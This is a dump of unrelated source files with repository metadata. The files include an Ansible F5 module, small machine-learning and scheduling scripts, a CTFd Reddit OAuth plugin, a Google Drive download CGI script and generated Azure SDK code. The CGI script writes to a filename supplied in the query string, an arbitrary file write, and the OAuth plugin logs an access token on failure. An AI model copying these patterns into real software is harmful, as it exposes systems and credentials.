# model = swagger_client.models.group.Group() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
4acd426428bf36b3e05b49f55188a9d1fb157d9d | eccda8bebcf343c6c2742980a604905135485b69 | /library/f5bigip_ltm_persistence_ssl.py | f4700fcb09e98962ecc1758d5f6d19e2c719c089 | [
"Apache-2.0"
] | permissive | erjac77/ansible-module-f5bigip | 5c920dc239098d6d3a8311da3ccb9562428a8362 | 96af6d5dc77d8ccbe18cb4fdc916625756e5f9dd | refs/heads/master | 2021-01-11T08:33:52.304903 | 2020-02-14T21:42:09 | 2020-02-14T21:42:09 | 76,477,286 | 6 | 5 | Apache-2.0 | 2018-08-09T20:41:31 | 2016-12-14T16:30:04 | Python | UTF-8 | Python | false | false | 5,650 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_persistence_ssl
short_description: BIG-IP ltm persistence ssl module
description:
- Configures a Secure Socket Layer (SSL) persistence profile.
version_added: "2.4"
author:
- "Eric Jacob (@erjac77)"
options:
app_service:
description:
- Specifies the application service to which the object belongs.
defaults_from:
description:
- Specifies the existing profile from which the system imports settings for the new profile.
default: ssl
description:
description:
- Specifies descriptive text that identifies the component.
match_across_pools:
description:
- Specifies, when enabled, that the system can use any pool that contains this persistence record.
default: disabled
choices: ['enabled', 'disabled']
match_across_services:
description:
- Specifies, when enabled, that all persistent connections from a client IP address, which go to the same
virtual IP address, also go to the same node.
default: disabled
choices: ['enabled', 'disabled']
match_across_virtuals:
description:
- Specifies, when enabled, that all persistent connections from the same client IP address go to the same
node.
default: disabled
choices: ['enabled', 'disabled']
mirror:
description:
- Specifies whether the system mirrors persistence records to the high-availability peer.
default: disabled
choices: ['enabled', 'disabled']
name:
description:
- Specifies a unique name for the component.
required: true
override_connection_limit:
description:
- Specifies, when enabled, that the pool member connection limits are not enforced for persisted clients.
default: disabled
choices: ['enabled', 'disabled']
partition:
description:
- Specifies the administrative partition in which the component object resides.
default: Common
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
timeout:
description:
- Specifies the duration of the persistence entries.
default: 300
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
EXAMPLES = '''
- name: Create LTM SSL Persistence profile
f5bigip_ltm_persistence_cookie:
f5_hostname: 172.16.227.35
f5_username: admin
f5_password: admin
f5_port: 443
name: my_ssl_persistence
partition: Common
description: My ssl persistence profile
defaults_from: /Common/ssl
state: present
delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
@property
def argument_spec(self):
argument_spec = dict(
app_service=dict(type='str'),
defaults_from=dict(type='str'),
description=dict(type='str'),
match_across_pools=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_services=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_virtuals=dict(type='str', choices=F5_ACTIVATION_CHOICES),
mirror=dict(type='str', choices=F5_ACTIVATION_CHOICES),
override_connection_limit=dict(type='str', choices=F5_ACTIVATION_CHOICES),
timeout=dict(type='int')
)
argument_spec.update(F5_PROVIDER_ARGS)
argument_spec.update(F5_NAMED_OBJ_ARGS)
return argument_spec
@property
def supports_check_mode(self):
return True
class F5BigIpLtmPersistenceSsl(F5BigIpNamedObject):
def _set_crud_methods(self):
self._methods = {
'create': self._api.tm.ltm.persistence.ssls.ssl.create,
'read': self._api.tm.ltm.persistence.ssls.ssl.load,
'update': self._api.tm.ltm.persistence.ssls.ssl.update,
'delete': self._api.tm.ltm.persistence.ssls.ssl.delete,
'exists': self._api.tm.ltm.persistence.ssls.ssl.exists
}
def main():
params = ModuleParams()
module = AnsibleModule(argument_spec=params.argument_spec, supports_check_mode=params.supports_check_mode)
try:
obj = F5BigIpLtmPersistenceSsl(check_mode=module.check_mode, **module.params)
result = obj.flush()
module.exit_json(**result)
except Exception as exc:
module.fail_json(msg=str(exc))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
fd9fed8d50f3bc3779e3425c4fcf511a9684675a | bd37ff289bcbe24cc6e8ab360569713b9109265d | /logistic_regression1.py | 0e62f1edd37807715a19d1310c273bd42e8e156f | [] | no_license | Sanil2108/python-machine-learning | fc035f6ddd586cf3dab9421002d4408c03b0589c | c9dbf8a1f34aa3b80c76986c742e85a9be4b2375 | refs/heads/master | 2021-01-11T09:00:28.995823 | 2017-06-18T06:08:33 | 2017-06-18T06:08:33 | 77,436,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | import numpy as np
import matplotlib.pyplot as plt
all_cost=[]
def logistic(z):
return 1/(1+np.exp(-z))
def hypothesis(theta, X):
return logistic(np.array(np.matrix(X)*np.transpose(np.matrix(theta))))[0][0]
# return getY(theta, X)
def cost(theta, X, y):
m=len(y)
total=0
for i in range(m):
total+=(y[i]*np.log(hypothesis(theta, X[i])) + (1-y[i])*np.log(1-hypothesis(theta, X[i])))
return -total/m
def gradient_descent(X, y, alpha):
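    # Note: theta is read and updated as a module-level global, not passed in.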
tempCost=1000
while(tempCost>0.01):
for j in range(len(theta)):
pd=0
for i in range(len(y)):
pd+=(hypothesis(theta, X[i])-y[i])*X[i][j]
theta[j]=theta[j]-alpha*pd
all_cost.append(tempCost)
if(tempCost-cost(theta, X, y)<1e-50):
break
tempCost=cost(theta, X, y)
print(tempCost)
print(theta)
# temp_x = np.linspace(0, len(all_cost), len(all_cost) + 1)
# for i in range(len(all_cost)):
# plt.plot(temp_x[i], all_cost[i], 'ro')
# plt.show()
return theta
#X is an (n+1) row vector
def getY(theta, X):
    # Threshold the logistic probability at 0.5. The original compared the raw
    # score theta^T X against 0.5, which is a different (and incorrect) rule,
    # since logistic(z) >= 0.5 exactly when z >= 0.
    if(hypothesis(theta, X)>=0.5):
        return 1
    else:
        return 0

# new dataset for a circular decision boundary; each row of X is the
# feature map [1, x1, x1^2, x2, x2^2, x1*x2]
X = [
[1, 0, 0, 0, 0, 0],
[1, 0.5, 0.25, -0.5, 0.25, -0.25],
[1, 0.5, 0.25, 0.5, 0.25, 0.25],
[1, - 0.5, 0.25, -0.5, 0.25, 0.25],
[1, -0.5, 0.25, 0.5, 0.25, -0.25],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, -1, 1, -1],
[1, -1, 1, 1, 1, -1],
[1, -1, 1, -1, 1, 1],
[1, 0, 0, 1, 1, 0],
[1, 0, 0, -1, 1, 0],
[1, 1, 1, 0, 0, 0],
[1, -1, 1, 0, 0, 0]
]
y = [
0,
0,
0,
0,
0,
1,
1,
1,
1,
1,
1,
1,
1
]
theta = [
0,
0,
0,
0,
0,
0
]
alpha = 0.05
gradient_descent(X, y, alpha) | [
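
# A hedged usage sketch (not part of the original script): after training,
# getY classifies a point expressed in the same feature map
# [1, x1, x1^2, x2, x2^2, x1*x2]. For example:
# print(getY(theta, [1, 0.2, 0.04, 0.1, 0.01, 0.02]))  # expected 0 (inside the boundary)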
"[email protected]"
] | |
b81f580bfd884ff1bbcd428a82ed1131ae1d6e8d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_75/717.py | 36146101c64393b9b35cbf7d17c8eadde15d28f0 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | def solvecase(L):
C = int(L[0])
D = int(L[C+1])
N = int(L[C+D+2])
F = L[1:C+1]
X = L[C+2:C+D+2]
S = L[-1]
Q = []
for s in S:
#get spell from list
Q.append(s)
#send recent spells to check combination
if len(Q) > 1:
comb = chkcombine(F,Q[-1],Q[-2])
if comb!=None:
Q.pop()
Q.pop()
Q.append(comb)
#check for opposing spells
for i in range(len(Q)-1):
if chkoppose(X,Q[i],Q[-1]):
#destroy everything
Q = []
break
return Q
def chkcombine(formulalist,s1,s2):
for formula in formulalist:
if (formula[0]==s1 and formula[1]==s2) or (formula[1]==s1 and formula[0]==s2):
return formula[2]
return None
def chkoppose(opposelist,s1,s2):
for oppose in opposelist:
if (oppose[0]==s1 and oppose[1]==s2) or (oppose[1]==s1 and oppose[0]==s2):
return True
return False
N = int(input())
for n in range(N):
r = solvecase(input().split(' '))
print("Case #",str(n+1),": [",sep='',end='')
print(", ".join(r),sep='',end='')
print(']')
| [
"[email protected]"
] | |
97f962ce6c17f6babfe9ca499eb8d54b7c02b803 | ba1066b0860a73020eb5c4ee0021f68e3639327c | /Sujet 1/evaluation.py | 2a1b30bdb920408611258d3a5c7a66af323e27fe | [] | no_license | Hiestaa/TARP-ODNL | cf51678ce4940d2d84a167317eb70298863cc9b1 | 3a09054558ddc188f80abfd13ea51e1e99d64d68 | refs/heads/master | 2021-01-25T07:27:54.313545 | 2014-01-13T01:14:33 | 2014-01-13T01:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,300 | py | from machine import Machine
from task import Task
import Log
import time
import os.path
class Evaluation:
def __init__(self, tasks, sequence, id):
self.tasks = []
for ti in sequence:
self.tasks.append(tasks[ti])
self.nbtasks = len(self.tasks)
self.taskcomplete = 0
self.machinelist = None
self.time = 0
self.log = None
#self.log = Log.Log('log/last.log.html')
self.id = id
def fast(self) :
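        # Permutation-flowshop makespan via the classic completion-time
        # recurrence (the commented numpy block below is an equivalent form).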
tab = []
for t in self.tasks:
copytask = []
for op in t.oplist:
copytask.append(op)
tab.append(copytask)
nbLines = len(tab[0])
nbColonnes = len(tab)
i = 1
while i < nbLines :
tab[0][i] = tab[0][i - 1] + tab[0][i]
i += 1
j = 1
while j < nbColonnes :
tab[j][0] = tab[j - 1][0] + tab[j][0]
i = 1
while i < nbLines :
if tab[j - 1][i] > tab[j][i - 1] :
tmp = tab[j - 1][i]
else :
tmp = tab[j][i - 1]
tab[j][i] = tab[j][i] + tmp
i += 1
j += 1
return tab[nbColonnes - 1][nbLines - 1]
# c = np.zeros((n + 1, m + 1))
# for i in range(1, n + 1):
# for j in range(1, m + 1):
# c[i, j] = max(c[i - 1, j], c[i, j - 1]) + tasks[order[i - 1], j - 1]
# return c[n, m]
def ontaskdone(self, task):
self.taskcomplete += 1
self.log.log_event_success(self.time, 'TaskEvent',"A task has been finished: " +str(task.id))
def onopdone(self):
self.log.log_event(self.time, 'TaskEvent', "An operation has been finished on first machine !")
if len(self.tasks):
task = self.tasks.pop(0)
task.reinit()
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
def findUniqueName(self, name):
lst = name.split('-')
for x in range(len(lst)):
if x is not 0:
test = reduce(lambda a, b: a + '-' + b,lst[:x])
if not os.path.isfile('log/' + test + '.log.html'):
return 'log/' + test + '.log.html'
return 'log/' + name + '.log.html'
def simulation(self):
self.log = Log.Log(self.findUniqueName(self.id))
self.log.log_init_tasklist(self.tasks)
self.log.log_event_info(self.time, 'Execution', "Execution started !")
task = self.tasks.pop(0)
task.reinit()
k = 0
for op in task.oplist:
m = Machine(k, self.log)
k += 1
if not self.machinelist:
self.machinelist = m
else:
tmp = self.machinelist
while tmp.next:
tmp = tmp.next
tmp.next = m
self.log.log_event(self.time, 'Execution', str(self.machinelist.getNbMachines()) + " machines added to process operations.")
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
        while self.taskcomplete != self.nbtasks:  # use != ; 'is not' relies on int identity and is unreliable
#print self.time,
self.time += 1
self.machinelist.update(self.time)
self.log.log_event_success(self.time, 'Execution', "All tasks done, execution successfully done !")
self.log.log_init_machines()
m = self.machinelist
while m:
self.log.log_machine_state(m.id, m.total_working_time, m.total_waiting_time, m.work_history)
m = m.next
self.log.log_close()
return self.time
if __name__ == '__main__':
    tasks = [
        Task(1, [10, 40, 30]),
        Task(2, [20, 50, 10]),
        Task(3, [1, 5, 10]),
        Task(4, [5, 20, 10]),
        Task(5, [10, 15, 5])
    ]
    seq = [4, 3, 1, 2, 0]
    t = time.time()
    # Evaluation has no run() method and requires an id argument; simulation()
    # returns the simulated makespan (the 'test' id is an arbitrary log name).
    makespan = Evaluation(tasks, seq, 'test').simulation()
    print ""
    print "Evaluation time: ", time.time() - t, "s"
    print "Evaluation result: ", makespan, "time units"
"[email protected]"
] | |
6912f2477ca42c2d02095a157bee916ef68c2c49 | 55f67b4252ae9331b691e62e14cc055a78d23d74 | /__init__.py | a686b9d92d3e69235eae229dca1fcc8cd624f1d0 | [] | no_license | BlueSCar/ctfd-reddit-oauth | 417c0fb67425269e6bae31d4198818d7ab87442c | b4c74fdb2497387c64d481694d3b3cf59e93cbc0 | refs/heads/master | 2020-12-27T07:23:47.637438 | 2020-02-03T04:07:17 | 2020-02-03T04:07:17 | 237,813,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,309 | py | from flask import (
current_app as app,
render_template,
request,
redirect,
url_for,
session,
Blueprint,
)
from itsdangerous.exc import BadTimeSignature, SignatureExpired, BadSignature
from CTFd.models import db, Users, Teams
from CTFd.utils import get_config, get_app_config
from CTFd.utils.decorators import ratelimit
from CTFd.utils import user as current_user
from CTFd.utils import config, validators
from CTFd.utils import email
from CTFd.utils.security.auth import login_user, logout_user
from CTFd.utils.crypto import verify_password
from CTFd.utils.logging import log
from CTFd.utils.decorators.visibility import check_registration_visibility
from CTFd.utils.config import is_teams_mode
from CTFd.utils.config.visibility import registration_visible
from CTFd.utils.modes import TEAMS_MODE
from CTFd.utils.plugins import override_template
from CTFd.utils.security.signing import unserialize
from CTFd.utils.helpers import error_for, get_errors
import os
import base64
import requests
def load(app):
dir_path = os.path.dirname(os.path.realpath(__file__))
template_path = os.path.join(dir_path, 'reddit-signin.html')
override_template('login.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-register.html')
override_template('register.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-scoreboard.html')
override_template('scoreboard.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-users.html')
override_template('users.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-public.html')
override_template('public.html', open(template_path).read())
@app.route("/reddit")
def reddit_login():
endpoint = (
get_app_config("REDDIT_AUTHORIZATION_ENDPOINT")
or get_config("reddit_authorization_endpoint")
or "https://ssl.reddit.com/api/v1/authorize"
)
client_id = get_app_config("REDDIT_CLIENT_ID") or get_config("reddit_client_id")
callback_url = get_app_config("REDDIT_CALLBACK_URL") or get_config("reddit_callback_url")
if client_id is None:
error_for(
endpoint="reddit.login",
message="Reddit OAuth Settings not configured. "
"Ask your CTF administrator to configure Reddit integration.",
)
return redirect(url_for("auth.login"))
redirect_url= "{endpoint}?client_id={client_id}&response_type=code&state={state}&redirect_uri={callback_url}&duration=temporary&scope=identity".format(
endpoint=endpoint, client_id=client_id, state=session["nonce"], callback_url=callback_url
)
return redirect(redirect_url)
@app.route("/reddit/callback", methods=["GET"])
@ratelimit(method="GET", limit=10, interval=60)
def oauth_redirect():
oauth_code = request.args.get("code")
state = request.args.get("state")
if session["nonce"] != state:
log("logins", "[{date}] {ip} - OAuth State validation mismatch")
error_for(endpoint="auth.login", message="OAuth State validation mismatch.")
return redirect(url_for("auth.login"))
if oauth_code:
url = (
get_app_config("REDDIT_TOKEN_ENDPOINT")
or get_config("reddit_token_endpoint")
or "https://ssl.reddit.com/api/v1/access_token"
)
client_id = get_app_config("REDDIT_CLIENT_ID") or get_config("reddit_client_id")
client_secret = get_app_config("REDDIT_CLIENT_SECRET") or get_config(
"reddit_client_secret"
)
reddit_user_agent = get_app_config("REDDIT_USER_AGENT") or get_config("reddit_user_agent")
callback_url = get_app_config("REDDIT_CALLBACK_URL") or get_config("reddit_callback_url")
client_auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
headers = {"content-type": "application/x-www-form-urlencoded", "User-Agent": reddit_user_agent}
token_request = requests.post(url, auth=client_auth, data={"grant_type": "authorization_code", "code": oauth_code, "redirect_uri": callback_url}, headers=headers)
if token_request.status_code == requests.codes.ok:
token = token_request.json()["access_token"]
user_url = (
get_app_config("REDDIT_API_ENDPOINT")
or get_config("reddit_api_endpoint")
or "https://oauth.reddit.com/api/v1/me"
)
headers = {
"Authorization": "Bearer " + str(token),
"User-Agent": reddit_user_agent
}
api_response = requests.get(url=user_url, headers=headers)
log("logins", str(api_response))
api_data = api_response.json()
user_id = api_data["id"]
user_name = api_data["name"]
user_email = api_data["name"] + "@reddit.com"
user = Users.query.filter_by(name=user_name).first()
if user is None:
# Check if we are allowing registration before creating users
if registration_visible():
user = Users(
name=user_name,
email=user_email,
oauth_id=user_id,
verified=True,
)
db.session.add(user)
db.session.commit()
else:
log("logins", "[{date}] {ip} - Public registration via Reddit blocked")
error_for(
endpoint="auth.login",
message="Public registration is disabled. Please try again later.",
)
return redirect(url_for("auth.login"))
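                # NOTE: reddit's /api/v1/me response has no "team" field, so this
                # teams-mode branch (apparently inherited from CTFd's MajorLeagueCyber
                # OAuth flow) would raise a KeyError if user_mode were set to teams.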
if get_config("user_mode") == TEAMS_MODE:
team_id = api_data["team"]["id"]
team_name = api_data["team"]["name"]
team = Teams.query.filter_by(oauth_id=team_id).first()
if team is None:
team = Teams(name=team_name, oauth_id=team_id, captain_id=user.id)
db.session.add(team)
db.session.commit()
team_size_limit = get_config("team_size", default=0)
if team_size_limit and len(team.members) >= team_size_limit:
plural = "" if team_size_limit == 1 else "s"
size_error = "Teams are limited to {limit} member{plural}.".format(
limit=team_size_limit, plural=plural
)
error_for(endpoint="auth.login", message=size_error)
return redirect(url_for("auth.login"))
team.members.append(user)
db.session.commit()
if user.oauth_id is None:
user.oauth_id = user_id
user.verified = True
db.session.commit()
login_user(user)
return redirect(url_for("challenges.listing"))
else:
log("logins", "[{date}] {ip} - OAuth token retrieval failure")
log("logins", str(token_request))
log("logins", str(token_request.status_code))
log("logins", token_request.json()["access_token"])
error_for(endpoint="auth.login", message="OAuth token retrieval failure.")
return redirect(url_for("auth.login"))
else:
log("logins", "[{date}] {ip} - Received redirect without OAuth code")
error_for(
endpoint="auth.login", message="Received redirect without OAuth code."
)
return redirect(url_for("auth.login"))
| [
"[email protected]"
] | |
966d74d56d048ce98e54842ab9549589742118e9 | 2a839c9f5ad608cbc6cbb7d03a8af482dcbd2956 | /cgi-bin/download.py | 49a2220a84d8090abe8d27c4ea01117f334c80cc | [] | no_license | scraperdragon/google-docs | 0a3653a10a8f4db6c419745e87c45564706405f8 | 56a6955bfbfa1acc56732356f9d828690985fce3 | refs/heads/master | 2021-01-19T15:32:38.868177 | 2015-04-17T10:55:17 | 2015-04-17T10:55:17 | 22,986,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | #!/usr/bin/python
import sys
import os
import requests
import json
import urlparse
def request_with_key(url):
return requests.get(url, headers={'Authorization': 'Bearer {key}'.format(key=key)})
def output(msg):
print json.dumps(msg)
exit(0)
DRIVE_FILES_URL = "https://www.googleapis.com/drive/v2/files/{id}"
DOCUMENT_EXPORT_URL = "https://docs.google.com/feeds/download/documents/export/Export?id={id}&exportFormat={format}"
print "Content-type: application/json\n\n";
# acquire environment
if len(sys.argv) == 4:
doc_id, key, filename = sys.argv[1:]
else:
params = urlparse.parse_qs(os.environ.get("QUERY_STRING"))
doc_id, = params.get('id')
key, = params.get('key')
filename, = params.get('filename')
if not(doc_id):
output({"error": "no id"})
if not(key):
output({"error": "no key"})
if not(filename):
output({"error": "no filename"})
r = request_with_key(DRIVE_FILES_URL.format(id=doc_id))
try:
j = r.json()
except Exception:
output({"error": "response wasn't json", "error_detail":r.content, "params": params})
if 'downloadUrl' in j:
xlsx_url = j['downloadUrl']
else:
xlsx_url = j['exportLinks']['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']
xlsx_content = request_with_key(xlsx_url).content
with open(filename, 'w') as f:
f.write(xlsx_content)
output({"filename": filename})
| [
"[email protected]"
] | |
248fc2138c8eed4fa4fb235c3584ea31d3447f36 | 531c47c15b97cbcb263ec86821d7f258c81c0aaf | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_04_01/aio/operations_async/_azure_firewalls_operations_async.py | 550653dc96d84f6afaa60225d81bea644ed59841 | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] | permissive | YijunXieMS/azure-sdk-for-python | be364d3b88204fd3c7d223df23756386ff7a3361 | f779de8e53dbec033f98f976284e6d9491fd60b3 | refs/heads/master | 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 | MIT | 2020-06-16T16:38:15 | 2019-08-30T21:08:55 | Python | UTF-8 | Python | false | false | 21,582 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AzureFirewallsOperations:
"""AzureFirewallsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> None:
"""Deletes the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: None, or the result of cls(response)
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
azure_firewall_name=azure_firewall_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def get(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> "models.AzureFirewall":
"""Gets the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AzureFirewall, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
azure_firewall_name: str,
parameters: "models.AzureFirewall",
**kwargs
) -> "models.AzureFirewall":
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'AzureFirewall')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
